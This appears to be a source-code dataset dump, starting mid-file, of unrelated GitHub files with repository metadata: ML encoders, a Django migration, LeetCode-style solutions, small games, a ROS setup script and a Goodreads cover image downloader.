nz = torch.Tensor(np.zeros((batch_size,n_channels,input_width,input_height)))
uz = torch.ones(batch_size,input_width*input_height,dtype=torch.long)
model = Unet()
outputs = model.forward(nz)
criterion = nn.CrossEntropyLoss()
learning_rate = 1e-4
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
print(outputs.shape, uz.shape)
loss = criterion(outputs, uz)
loss.backward()
'''
for t in range(500):
# Forward pass: compute predicted y by passing x to the model.
y_pred = model(x)
# Compute and print loss.
loss = loss_fn(y_pred, y)
print(t, loss.item())
# Before the backward pass, use the optimizer object to zero all of the
# gradients for the variables it will update (which are the learnable
# weights of the model). This is because by default, gradients are
# accumulated in buffers( i.e, not overwritten) whenever .backward()
# is called. Checkout docs of torch.autograd.backward for more details.
optimizer.zero_grad()
# Backward pass: compute gradient of the loss with respect to model
# parameters
loss.backward()
# Calling the step function on an Optimizer makes an update to its
# parameters
optimizer.step()
'''
'''
import hiddenlayer as hl
hl_graph = hl.build_graph(model, nz)
hl_graph.save("xxx", format="png")
''' | [
"hrm@cin.ufpe.br"
] | hrm@cin.ufpe.br |
b0f34c881a1959c5d0174326174bb7dd21c92f3e | b6635c2cc6ce6d17da4d2aed5c17281ff50255ef | /12week/Code10-07.py | 4eaa7d992d4a8da07f785e2f1f0164dce629a18c | [] | no_license | mi642/Python_DataStructure | fcebbef7e4dd895eb1c39c3313f8937c92b43896 | 774c52a6fa7c410d0e00dce5f757c8c4b682710d | refs/heads/master | 2023-05-28T15:59:10.409648 | 2021-06-10T07:16:34 | 2021-06-10T07:16:34 | 344,525,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | def gugu(dan, num):
print("%d x %d = %d" % (dan, num, dan * num))
if (num < 9):
gugu(dan, num + 1)
for dan in range(2, 10):
print("## %d단 ##" % dan)
gugu(dan, 1) | [
"emira1239@naver.com"
] | emira1239@naver.com |
79e8cc47e84840e0528b0ceb9ba10e560f07f8b0 | e22140d66b84b5ad05b6bbc116f224338fd361e1 | /assignment5.py | 152a33675bd6705db13941ef40b095ead659d99a | [] | no_license | SimranKucheria/PPL-Assignments | 958c86859c0965762714e09fce1c564b4a410115 | 318d5a26da831124067e18b8ff161d7dbe496394 | refs/heads/master | 2022-07-16T23:47:30.555037 | 2020-05-18T12:59:17 | 2020-05-18T12:59:17 | 264,939,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | try:
file = open("Assignment.txt","r")
for line in file:
print(line)
except:
print("File Doesn't exist")
| [
"noreply@github.com"
] | SimranKucheria.noreply@github.com |
2993ce92666d43ec9e6a520bf4027609ca676413 | 221e3afe0ef457c088d9c7725b5a1cc70d77b16e | /base/migrations/0002_remove_category_content.py | 418f3ac3266d248bb9952513d02122a2b10c217b | [] | no_license | Rockstreet/titov_base | 6615087518b33635da6fec4d73716670c0b25d5a | 612d842c423ffc3754e90a463029e9415aacb318 | refs/heads/master | 2021-01-19T05:22:06.940949 | 2017-04-12T16:09:06 | 2017-04-12T16:09:06 | 87,428,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-07 09:52
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('base', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='content',
),
]
| [
"ivan.tolkachev@gmail.com"
] | ivan.tolkachev@gmail.com |
f7818f18a8db54a2d37a4d2062a7d2c5ce841a31 | 2618895cfc1ccdfc5d2db6e9f6f055ffecb35bf9 | /New folder/enemy.py | 9ff3ee4843ee716d6884d336e262a6377d80cbb6 | [] | no_license | MechGodzilla/tryingbasicrpg | ea26f08012eb2ef9f8bb53ecbc3713178d5d4401 | a0729841b8a5e70f647efd7cacfd7bca02858c75 | refs/heads/master | 2021-01-18T16:38:43.186757 | 2017-04-12T00:32:13 | 2017-04-12T00:32:13 | 86,752,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # A better approach to this and the video's method is inheritance, create an Enemy() class as you said above and then have other classes such as
# Goblin(Enemy) inherit from the Enemy(object) with the super().__init__() method.
# https://stackoverflow.com/questions/23117717/python-super-init-inheritance
# from player import Player
#
#
# class Goblin(Player):
# def __init__(self, name):
# super(Goblin, self).__init__(name)
# self.maxhealth = 50
# self.health = self.maxhealth
# self.attack = 5
# self.goldGain = 10
#
#
# class Zombie(Player):
# def __init__(self, name):
# super(Zombie, self).__init__(name)
# self.maxhealth = 70
# self.health = self.maxhealth
# self.attack = 7
# self.goldGain = 15
class Goblin:
def __init__(self, name):
self.name = name
self.maxhealth = 50
self.health = self.maxhealth
self.attack = 5
self.goldGain = 10
class Zombie:
def __init__(self, name):
self.name = name
self.maxhealth = 70
self.health = self.maxhealth
self.attack = 7
self.goldGain = 15 | [
"serpentining@gmail.com"
] | serpentining@gmail.com |
15f2bf4dbe2c26ca77bd77f061fe0fada00251f9 | 005b5c3fd045d59bbe34a54cd6b85904c7443d2e | /arrays_and_strings/group_anagrams.py | e31e11314cd010b194fc4ee29de67c6c3b3b74d6 | [] | no_license | karthik4636/practice_problems | 84a9d7df6a03adeadea7058024f078c292c70c4a | 8e87b10bd77289b891591b770a6f7adc2c00fdf0 | refs/heads/master | 2021-07-11T15:02:07.484510 | 2020-06-23T03:41:05 | 2020-06-23T03:41:05 | 152,669,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | # https://leetcode.com/problems/group-anagrams/
class Solution:
def get_dict(self,str):
a ={}
for i in str:
if i not in a:
a[i] = 1
else:
a[i]+=1
return a
def groupAnagrams(self, strs):
"""
:type strs: List[str]
:rtype: List[List[str]]
"""
b = {}
for str in strs:
sig = self.get_dict(str)
sig = tuple(sorted(sig.items()))
if sig not in b:
b[sig]=[str]
else:
b[sig].append(str)
return list(b.values())
s = Solution()
a=s.groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"])
b=1 | [
"karthik4636@gmail.com"
] | karthik4636@gmail.com |
f77bf2b8e7706767ba2b4ecf89cd1e873d538f5e | eceec8787ae18d1bac8fef5f115d7a257c00b905 | /pageObjects/api/create_board.py | 3589a834ee307792f947d159f2b7099cf299646c | [] | no_license | saurabhpiyush1187/qaassigment_oldreq | 6ef1e454513f0df56738f290a0aee7a62638e637 | cdc35d6841468072d40084a85ef85eb09a358c5e | refs/heads/main | 2023-03-06T02:25:22.462982 | 2021-02-15T08:46:17 | 2021-02-15T08:46:17 | 339,042,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,513 | py | import os
import json
from utilities.config_utils import ConfigUtils
from core.api.api_helper import RequestBuilder
from pageObjects.api.common_utils import CommonUtils
from utilities.customLogger import LogGen
class CreateBoard:
config_utils = ConfigUtils(os.getcwd())
request_builder = RequestBuilder()
mi_common_utils = CommonUtils()
logger = LogGen.loggen()
def __init__(self):
self.response = ""
self.response_content= ""
self.str_request_url = ""
self.uuid=""
self.str_auth_token =""
def validate_reponse(self):
"""
Description:
| This method calls the is_responsevalid from comon_utils to validate the response code
:return: None
"""
bln_response = self.mi_common_utils.is_responsevalid(self.response)
return bln_response
def create_board(self):
self.str_auth_token = self.mi_common_utils.springboard_get_authtoken()
dict_service_disc = self.config_utils.get_servicedescription("springboard_description.yml", "create_board")
str_request_url = dict_service_disc["target_url"] + dict_service_disc["endpoint"] + dict_service_disc[
"queryparams"]
headers = dict_service_disc["headers"]
headers["Authorization"] = "Bearer "+self.str_auth_token
payload = dict_service_disc["payload"]
self.response = self.request_builder.call_request(dict_service_disc["method"], str_request_url,
headers, pstr_payload=payload)
self.response_content = self.response.content
bln_response1 = self.mi_common_utils.is_reponsegenerated(self.response)
bln_validate_response = self.validate_reponse()
response_json = json.loads(self.response_content)
if bln_response1 and bln_validate_response:
self.logger.info("*****Board is created successfully***")
self.uuid = response_json['data']['uuid']
return self.uuid,self.str_auth_token
else:
self.logger.info("*****Board is not created successfully***Response code"+ str(self.response.status_code) )
return None
def verify_created_board(self,uuid):
dict_service_disc = self.config_utils.get_servicedescription("springboard_description.yml", "get_board")
str_request_url = dict_service_disc["target_url"] + dict_service_disc["endpoint"] +"/"+ str(uuid)+ dict_service_disc[
"queryparams"]
headers = dict_service_disc["headers"]
headers["Authorization"] = "Bearer "+self.str_auth_token
payload = dict_service_disc["payload"]
self.response = self.request_builder.call_request(dict_service_disc["method"], str_request_url,
headers, pstr_payload=payload)
self.response_content = self.response.content
bln_response1 = self.mi_common_utils.is_reponsegenerated(self.response)
bln_validate_response = self.validate_reponse()
response_json = json.loads(self.response_content)
if bln_response1 and bln_validate_response:
pstr_uuid = response_json['data']['uuid']
if pstr_uuid == uuid:
self.logger.info("*****Board is verified successfully***")
return True
else:
self.logger.info("*****Board is not verified successfully***Response code"+ str(self.response.status_code) )
return False
| [
"saurabhpiyush@spglobal.com"
] | saurabhpiyush@spglobal.com |
64015cf8bc203dc2e3de671c7244cb1c210ceae3 | 26e828ef4dfd9b5f27e4e59aa053043ae4971554 | /bejay_dev/IoT/get_firebase.py | 6be23b02de481966a58ce07980d704898191fed4 | [] | no_license | hamzaMahdi/myjay-bot | d29e2000f3e851e690ba3be476d5b682ebb687a3 | f38dbabf801856e3d51aa022c05aad4690c1ae2a | refs/heads/main | 2023-08-28T03:48:38.292386 | 2021-11-03T02:00:49 | 2021-11-03T02:00:49 | 361,912,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | import pyrebase
import time
config = {
#config removed for privacy
}
firebase = pyrebase.initialize_app(config)
db = firebase.database()
# while True:
# user = db.child("users").get()
# print(user.val()) # users
def stream_handler(message):
print(message["event"]) # put
print(message["path"]) # /-K7yGTTEp7O549EzTYtI
print(message["data"].get('name')) # {'title': 'Pyrebase', "body": "etc..."}
my_stream = db.child("users").stream(stream_handler)
| [
"hamzamahdi96@gmail.com"
] | hamzamahdi96@gmail.com |
2d32855077a8fd0594875c11d0c248fa27e1c3d9 | df24807455a5bc4db794d79cc88e6bde93d3d404 | /HH_glycopeptide - KK testing v2/sequencespace.py | e7d7bfc3a84a3b32c1db46ef3e02d0eb112fb0cd | [] | no_license | GlycReSoft2/glycopeptide-testing | 075b594025c95a9c9cfb79fcf802bd326459238f | 574bc5b44ef8a562e2676aca24062b04f4bfeb17 | refs/heads/master | 2021-01-23T11:49:35.306116 | 2014-05-22T17:33:19 | 2014-05-22T17:33:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,178 | py | from sequence import Sequence
from operator import and_
from functools import reduce
from modification import Modification
from residue import Residue
import copy
import itertools
import warnings
class SequenceSpace:
"""Generate all theoretical glycopeptide sequences"""
def __init__(self, seq, glycan_compo, glycan_sites, mod_list):
"""
seq -- sequence code
glycan_compo -- glycan compositions, dict.
glycan_sites -- sets of candidate sites for glycosylation
mod_list -- list of modifications.
"""
# Filter the glycan composition. Get the max number of HexNAc
self.seq = Sequence(seq) # Sequence object
self.glycan_composition = glycan_compo
self.candidate_sites = glycan_sites
self.modifications = mod_list
def getTheoreticalSequence(self, num_sites):
"""
Get theoretical sequence tailored for fragmenation
max_sites -- the number of maximum glycolsylation sites.
-1 means unlimited.
"""
#raw_seq = self.seq
seq_space = []
occupied_sites = []
#exploreSequence(mod_set, 0, raw_seq, occupied_sites, seq_space)
n = len(self.modifications)
ix_bound = []
## Get the candidate sites for all modification
for mod in self.modifications:
if mod.position != -1: # The position specified.
ix_bound.append((mod.position,)) # One element tuple
elif mod.target!= '': # The target specified.
ix_list = [ix for ix in range(self.seq.length) if self.seq.at(ix)[0].name == mod.target]
## temp_list has format like [(1,2,3), (2,3,4)]
temp_list = [ix for ix in itertools.combinations(ix_list, mod.number)]
ix_bound.append(temp_list)
else:
raise Exception('Unqualified modification!')
## Initialize the choice index for each modification type.
indices = [0] * n
while True:
if n != 0:
for i in reversed(range(n)):
## If not achiving the last choice of current index
if indices[i] != len(ix_bound[i]): # Within boundary, just out of the loop
break
else: # Out of boundary, reset the index.
indices[i] = 0
if i > 0:
indices[i-1] += 1
else:
return seq_space
## Check if current indecies are qualifed.
ix_sites = [ix_bound[ss][indices[ss]] for ss in range(n)]
else:
ix_sites = []
common_sites = set().union(*ix_sites)
glyco_sites = set(self.candidate_sites).difference(common_sites)
#glyco_num = glyco_compo['HexNAc']
if len(common_sites) != sum(map(len,ix_sites)) | (num_sites > len(glyco_sites)): # Invalid config.
indices[i] += 1
continue
raw_seq = copy.deepcopy(self.seq)
for x in range(n):
for mod_site in ix_bound[x][indices[x]]:
raw_seq.addModification(mod_site, self.modifications[x].name)
## Get available glycosylation sites.
#upper_limit = (min(max_sites, len(glyco_sites)) if max_sites > 0 else len(glyco_sites))
#for m in range(1, upper_limit+1):
for sites in itertools.combinations(glyco_sites, num_sites):
temp_seq = copy.deepcopy(raw_seq)
# Append HexNAc to the corresponding sites.
for site in sites:
gly_mod = Modification("HexNAc", site, 1, Residue("HexNAc").mass, 'Asn')
temp_seq.appendModification(gly_mod)
seq_space.append(temp_seq)
if n == 0:
return seq_space
# Only increase the last index.
indices[-1] += 1
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
31e5ebee994f90436a19d50002aded516ef02700 | 2cb9eb8074c1e7d7a9ae06343b40ccfe178103eb | /modules/encoders/enc_flow.py | 21c3382d05234e3c930afdd44e008f4650a28928 | [
"MIT"
] | permissive | SmilesDZgk/DU-VAE | aea02cb023e0b285ff85803849ee6f9d44185b99 | 6c590922a5b634fadff814bd70d05065d584fa9f | refs/heads/master | 2023-05-14T09:53:39.399140 | 2021-06-09T03:38:49 | 2021-06-09T03:38:49 | 374,944,013 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,467 | py | from .flow import *
import torch
from torch import nn
import numpy as np
import math
from ..utils import log_sum_exp
class IAFEncoderBase(nn.Module):
"""docstring for EncoderBase"""
def __init__(self):
super(IAFEncoderBase, self).__init__()
def sample(self, input, nsamples):
"""sampling from the encoder
Returns: Tensor1, Tuple
Tensor1: the tensor latent z with shape [batch, nsamples, nz]
Tuple: contains the tensor mu [batch, nz] and
logvar[batch, nz]
"""
z_T, log_q_z = self.forward(input, nsamples)
return z_T, log_q_z
def forward(self, x, n_sample):
"""
Args:
x: (batch_size, *)
Returns: Tensor1, Tensor2
Tensor1: the mean tensor, shape (batch, nz)
Tensor2: the logvar tensor, shape (batch, nz)
"""
raise NotImplementedError
def encode(self, input, args):
"""perform the encoding and compute the KL term
Returns: Tensor1, Tensor2
Tensor1: the tensor latent z with shape [batch, nsamples, nz]
Tensor2: the tenor of KL for each x with shape [batch]
"""
# (batch, nsamples, nz)
z_T, log_q_z = self.forward(input, args.nsamples)
log_p_z = self.log_q_z_0(z=z_T) # [b s nz]
kl = log_q_z - log_p_z
# free-bit
if self.training and args.fb == 1 and args.target_kl > 0:
kl_obj = torch.mean(kl, dim=[0, 1], keepdim=True)
kl_obj = torch.clamp_min(kl_obj, args.target_kl)
kl_obj = kl_obj.expand(kl.size(0), kl.size(1), -1)
kl = kl_obj
return z_T, kl.sum(dim=[1, 2]) # like KL
def reparameterize(self, mu, logvar, nsamples=1):
"""sample from posterior Gaussian family
Args:
mu: Tensor
Mean of gaussian distribution with shape (batch, nz)
logvar: Tensor
logvar of gaussian distibution with shape (batch, nz)
Returns: Tensor
Sampled z with shape (batch, nsamples, nz)
"""
# import ipdb
# ipdb.set_trace()
batch_size, nz = mu.size()
std = logvar.mul(0.5).exp()
mu_expd = mu.unsqueeze(1).expand(batch_size, nsamples, nz)
std_expd = std.unsqueeze(1).expand(batch_size, nsamples, nz)
eps = torch.zeros_like(std_expd).normal_()
return mu_expd + torch.mul(eps, std_expd)
def eval_inference_dist(self, x, z, param=None):
"""this function computes log q(z | x)
Args:
z: tensor
different z points that will be evaluated, with
shape [batch, nsamples, nz]
Returns: Tensor1
Tensor1: log q(z|x) with shape [batch, nsamples]
"""
nz = z.size(2)
if not param:
mu, logvar = self.forward(x)
else:
mu, logvar = param
# if self.args.gamma <0:
# mu,logvar = self.trans_param(mu,logvar)
# import ipdb
# ipdb.set_trace()
# (batch_size, 1, nz)
mu, logvar = mu.unsqueeze(1), logvar.unsqueeze(1)
var = logvar.exp()
# (batch_size, nsamples, nz)
dev = z - mu
# (batch_size, nsamples)
log_density = -0.5 * ((dev ** 2) / var).sum(dim=-1) - \
0.5 * (nz * math.log(2 * math.pi) + logvar.sum(-1))
return log_density
class VariationalFlow(IAFEncoderBase):
"""Approximate posterior parameterized by a flow (https://arxiv.org/abs/1606.04934)."""
def __init__(self, args, vocab_size, model_init, emb_init):
super().__init__()
self.ni = args.ni
self.nh = args.enc_nh
self.nz = args.nz
self.args = args
flow_depth = args.flow_depth
flow_width = args.flow_width
self.embed = nn.Embedding(vocab_size, args.ni)
self.lstm = nn.LSTM(input_size=args.ni, hidden_size=args.enc_nh, num_layers=1,
batch_first=True, dropout=0)
self.linear = nn.Linear(args.enc_nh, 4 * args.nz, bias=False)
modules = []
for _ in range(flow_depth):
modules.append(InverseAutoregressiveFlow(num_input=args.nz,
num_hidden=flow_width * args.nz, # hidden dim in MADE
num_context=2 * args.nz))
modules.append(Reverse(args.nz))
self.q_z_flow = FlowSequential(*modules)
self.log_q_z_0 = NormalLogProb()
self.softplus = nn.Softplus()
self.reset_parameters(model_init, emb_init)
self.BN = False
if self.args.gamma > 0:
self.BN = True
self.mu_bn = nn.BatchNorm1d(args.nz, eps=1e-8)
self.gamma = args.gamma
nn.init.constant_(self.mu_bn.weight, self.args.gamma)
nn.init.constant_(self.mu_bn.bias, 0.0)
self.DP = False
if self.args.p_drop > 0 and self.args.delta_rate > 0:
self.DP = True
self.p_drop = self.args.p_drop
self.delta_rate = self.args.delta_rate
def reset_parameters(self, model_init, emb_init):
for name, param in self.lstm.named_parameters():
# self.initializer(param)
if 'bias' in name:
nn.init.constant_(param, 0.0)
# model_init(param)
elif 'weight' in name:
model_init(param)
model_init(self.linear.weight)
emb_init(self.embed.weight)
def forward(self, input, n_samples):
"""Return sample of latent variable and log prob."""
word_embed = self.embed(input)
_, (last_state, last_cell) = self.lstm(word_embed)
loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
loc, scale_arg = loc_scale.chunk(2, -1)
scale = self.softplus(scale_arg)
if self.BN:
ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
#if ss < self.gamma:
self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
loc = self.mu_bn(loc)
if self.DP and self.args.kl_weight >= self.args.drop_start:
var = scale ** 2
var = torch.dropout(var, p=self.p_drop, train=self.training)
var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
scale = var ** 0.5
loc = loc.unsqueeze(1)
scale = scale.unsqueeze(1)
h = h.unsqueeze(1)
eps = torch.randn((loc.shape[0], n_samples, loc.shape[-1]), device=loc.device)
z_0 = loc + scale * eps # reparameterization
log_q_z_0 = self.log_q_z_0(loc=loc, scale=scale, z=z_0)
z_T, log_q_z_flow = self.q_z_flow(z_0, context=h)
log_q_z = (log_q_z_0 + log_q_z_flow) # [b s nz]
if torch.sum(torch.isnan(z_T)):
import ipdb
ipdb.set_trace()
################
if torch.rand(1).sum() <= 0.0005:
if self.BN:
self.mu_bn.weight
return z_T, log_q_z
# return z_0, log_q_z_0.sum(-1)
def infer_param(self, input):
word_embed = self.embed(input)
_, (last_state, last_cell) = self.lstm(word_embed)
loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
loc, scale_arg = loc_scale.chunk(2, -1)
scale = self.softplus(scale_arg)
# logvar = scale_arg
if self.BN:
ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
if ss < self.gamma:
self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
loc = self.mu_bn(loc)
if self.DP and self.args.kl_weight >= self.args.drop_start:
var = scale ** 2
var = torch.dropout(var, p=self.p_drop, train=self.training)
var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
scale = var ** 0.5
return loc, torch.log(scale ** 2)
def learn_feature(self, input):
word_embed = self.embed(input)
_, (last_state, last_cell) = self.lstm(word_embed)
loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
loc, scale_arg = loc_scale.chunk(2, -1)
import ipdb
ipdb.set_trace()
if self.BN:
loc = self.mu_bn(loc)
loc = loc.unsqueeze(1)
h = h.unsqueeze(1)
z_T, log_q_z_flow = self.q_z_flow(loc, context=h)
return loc, z_T
from .enc_resnet_v2 import ResNet
class FlowResNetEncoderV2(IAFEncoderBase):
def __init__(self, args, ngpu=1):
super(FlowResNetEncoderV2, self).__init__()
self.ngpu = ngpu
self.nz = args.nz
self.nc = 1
hidden_units = 512
self.main = nn.Sequential(
ResNet(self.nc, [64, 64, 64], [2, 2, 2]),
nn.Conv2d(64, hidden_units, 4, 1, 0, bias=False),
nn.BatchNorm2d(hidden_units),
nn.ELU(),
)
self.linear = nn.Linear(hidden_units, 4 * self.nz)
self.reset_parameters()
self.delta_rate = args.delta_rate
self.args = args
flow_depth = args.flow_depth
flow_width = args.flow_width
modules = []
for _ in range(flow_depth):
modules.append(InverseAutoregressiveFlow(num_input=args.nz,
num_hidden=flow_width * args.nz, # hidden dim in MADE
num_context=2 * args.nz))
modules.append(Reverse(args.nz))
self.q_z_flow = FlowSequential(*modules)
self.log_q_z_0 = NormalLogProb()
self.softplus = nn.Softplus()
self.BN = False
if self.args.gamma > 0:
self.BN = True
self.mu_bn = nn.BatchNorm1d(args.nz, eps=1e-8)
self.gamma = args.gamma
nn.init.constant_(self.mu_bn.weight, self.args.gamma)
nn.init.constant_(self.mu_bn.bias, 0.0)
self.DP = False
if self.args.p_drop > 0 and self.args.delta_rate > 0:
self.DP = True
self.p_drop = self.args.p_drop
self.delta_rate = self.args.delta_rate
def reset_parameters(self):
for m in self.main.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
nn.init.xavier_uniform_(self.linear.weight)
nn.init.constant_(self.linear.bias, 0.0)
def forward(self, input, n_samples):
if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
else:
output = self.main(input)
output = self.linear(output.view(output.size()[:2]))
loc_scale, h = output.chunk(2, -1)
loc, scale_arg = loc_scale.chunk(2, -1)
scale = self.softplus(scale_arg)
if self.BN:
ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
#if ss < self.gamma:
self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
loc = self.mu_bn(loc)
if self.DP and self.args.kl_weight >= self.args.drop_start:
var = scale ** 2
var = torch.dropout(var, p=self.p_drop, train=self.training)
var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
scale = var ** 0.5
loc = loc.unsqueeze(1)
scale = scale.unsqueeze(1)
h = h.unsqueeze(1)
eps = torch.randn((loc.shape[0], n_samples, loc.shape[-1]), device=loc.device)
z_0 = loc + scale * eps # reparameterization
log_q_z_0 = self.log_q_z_0(loc=loc, scale=scale, z=z_0)
z_T, log_q_z_flow = self.q_z_flow(z_0, context=h)
log_q_z = (log_q_z_0 + log_q_z_flow) # [b s nz]
if torch.sum(torch.isnan(z_T)):
import ipdb
ipdb.set_trace()
if torch.rand(1).sum() <= 0.001:
if self.BN:
self.mu_bn.weight
return z_T, log_q_z
def infer_param(self, input):
if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
else:
output = self.main(input)
output = self.linear(output.view(output.size()[:2]))
loc_scale, h = output.chunk(2, -1)
loc, scale_arg = loc_scale.chunk(2, -1)
scale = self.softplus(scale_arg)
if self.BN:
ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
if ss < self.gamma:
self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
loc = self.mu_bn(loc)
if self.DP and self.args.kl_weight >= self.args.drop_start:
var = scale ** 2
var = torch.dropout(var, p=self.p_drop, train=self.training)
var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
scale = var ** 0.5
return loc, torch.log(scale ** 2)
def learn_feature(self, input):
if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
else:
output = self.main(input)
output = self.linear(output.view(output.size()[:2]))
loc_scale, h = output.chunk(2, -1)
loc, _ = loc_scale.chunk(2, -1)
if self.BN:
ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
if ss < self.gamma:
self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
loc = self.mu_bn(loc)
loc = loc.unsqueeze(1)
h = h.unsqueeze(1)
z_T, log_q_z_flow = self.q_z_flow(loc, context=h)
return loc, z_T
class NormalLogProb(nn.Module):
def __init__(self):
super().__init__()
def forward(self, z, loc=None, scale=None):
if loc is None:
loc = torch.zeros_like(z, device=z.device)
if scale is None:
scale = torch.ones_like(z, device=z.device)
var = torch.pow(scale, 2)
return -0.5 * torch.log(2 * np.pi * var) - torch.pow(z - loc, 2) / (2 * var)
| [
"sdz@mail.ustc.edu.cn"
] | sdz@mail.ustc.edu.cn |
a96327133682df32421991e8d10431e67cf5d8ba | 67c69f80aca0306b52ef261dab846cd9466e3bdc | /ros_backup/build/catkin_generated/generate_cached_setup.py | 840864541e4626d3f7f53e8b8e5035def94fa65b | [
"MIT"
] | permissive | zhenguo77555344/Final-System-Integrated | 29842508e4e72bc4e190b584c535c9c49baaea6d | 4ebb96d9d6ac4be751c93ada8a1b3358b4327a66 | refs/heads/master | 2022-11-28T14:41:40.504183 | 2019-10-08T14:30:47 | 2019-10-08T14:30:47 | 203,168,176 | 0 | 2 | MIT | 2022-11-22T00:23:14 | 2019-08-19T12:27:45 | Makefile | UTF-8 | Python | false | false | 1,332 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/opt/ros/kinetic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/student/Documents/Final-System-Integrated/ros/devel/env.sh')
output_filename = '/home/student/Documents/Final-System-Integrated/ros/build/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"pricss@126.com"
] | pricss@126.com |
63198985bafcfb41ecc400d469fc3f150a976001 | 849098b8e3df53d9c93e876a51ba2e21ad4a44f3 | /133_clone_graph.py | 8ff57f2cf898727e4914a9cd094a99c7786db543 | [] | no_license | Elsa1024/leetcode_java | ee4816a6ad5f9ac656d138cb576ffcc9e7c30184 | d2bb7f25093a4b0c483bc21fe86abc19109e9198 | refs/heads/master | 2020-03-08T04:49:43.367068 | 2018-10-27T18:06:21 | 2018-10-27T18:06:21 | 127,932,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | # Definition for a undirected graph node
# class UndirectedGraphNode:
# def __init__(self, x):
# self.label = x
# self.neighbors = []
class Solution:
# @param node, a undirected graph node
# @return a undirected graph node
def cloneGraph(self, node):
if not node:
return None
node_copy = UndirectedGraphNode(node.label)
node_dict = {node: node_copy}
queue = collections.deque([node])
while queue:
node = queue.popleft()
for neighbor in node.neighbors:
if neighbor not in node_dict:
neighbor_copy = UndirectedGraphNode(neighbor.label)
node_dict[neighbor] = neighbor_copy
node_dict[node].neighbors.append(neighbor_copy)
queue.append(neighbor)
else:
node_dict[node].neighbors.append(node_dict[neighbor])
return node_copy
| [
"daichenwei.elsa@gmail.com"
] | daichenwei.elsa@gmail.com |
aa531698ea829e073948d5c654cd6ff720fe9157 | 4f3b1bd644704057a3aa0352f55ef91df4eef811 | /Data Collection/Goodreads image collector.py | 1e00f76ec06cf6bb8a6b9aa29c796914d075d6a5 | [] | no_license | JieyuZhang97/Goodreads-book-analysis | 4f97f069c92fe70a4df4443f84bd216550fdc256 | a3c08670cd862f33d63d820fa1c0cabba8fce7dc | refs/heads/master | 2023-03-26T08:52:38.538447 | 2021-03-29T15:59:34 | 2021-03-29T15:59:34 | 346,068,399 | 0 | 0 | null | 2021-03-29T15:59:35 | 2021-03-09T16:19:05 | null | UTF-8 | Python | false | false | 449 | py | import pandas as pd
import wget
import os
book_data=pd.read_csv('book_data.csv')
PATH='C:\\Python\\Python37-32\\Scripts\\code\\images\\'
files=os.listdir(PATH)
n=0
if len(files)>0:
n=max([int(f[:-4]) for f in os.listdir(PATH)])+1
for i in range(n, len(book_data)):
url=book_data.at[i, 'image_url']
filename=f'{i}.jpg'
if not pd.isna(url):
wget.download(url, PATH+filename)
if i%100==0:
print(i) | [
"noreply@github.com"
] | JieyuZhang97.noreply@github.com |
